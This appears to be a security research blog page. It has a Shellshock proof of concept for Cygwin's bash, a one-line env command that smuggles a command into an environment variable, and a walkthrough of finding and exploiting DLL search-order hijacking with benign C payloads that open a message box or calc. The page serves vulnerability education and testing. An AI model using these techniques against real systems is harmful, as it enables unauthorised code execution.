Cygwin is a *nix like Command Line Interface (CLI) for Windows Operating Systems.
Cygwin by default ships with 4.1.x version at the time of my testing which has shellshock (CVE-2014-6271) vulnerability, use "bash --version" to check current version of bash shell.
To check the Vulnerability execute below PoC
$ env x='() { :;}; echo vulnerable' bash -c 'echo Exploited!!'
Dissecting the PoC
env command used to print environment variables or modify the environment where program executes
x environment variable/ function name
{ :;}; function definition
echo vulnerable' bash -c 'echo Exploited!!' is the malicious data after function definition.
Issue
Due to the vulnerability shell is interpreting the arbitrary commands after the termination of the function definition and executing entire text of environment variables value.
Same PoC command can be used on different Linux distributions for testing the presence of shellshock vulnerability.
Many Linux distributions already released patch for CVE-2014-6271, has lead to new vulnerability, CVE-2014-7169 which is less severe compared to shellshock.
Bit of Everything! Vulnerability Research, Reverse Engineering, Malware Analysis, Exploits etc...
Friday, September 26, 2014
Sunday, September 21, 2014
Finding and Exploiting DLL Injection Vulnerabilities
We need Process Monitor tool, part of sysinternals tools for finding the Vulnerability.
Loading of non-existent Dynamic Linked Libraries (DLL's) for the process under analysis can be found using below Process Monitor filter
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
Above Filter and Snapshot shows that Login.exe couldn't find DLL's SXS.dll, CLBCATQ.dll etc.
Created DLL with following Code and rename the DLL to any of SXS.dll, CLBCATQ.dll and copy to the path from where we are executing our vulnerable binary.
#include <windows .h>
#include <stdio .h>
#include <string .h>
BOOL APIENTRY DllMain( HMODULE hModule,DWORD fdwReason,LPVOID lpReserved)
{
MessageBox(NULL,L"DLL Injection by Disects !",
L"developed by Praveen Darshanam",
MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
return TRUE;
}
Search the DLL we injected
When we execute Login.exe binary our DLL is injected and executes code present in the DLL.
To execute calculator we can use below code
#include <windows .h> int exec_calc() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { exec_calc(); return 0; }
Done!
Subscribe to:
Posts (Atom)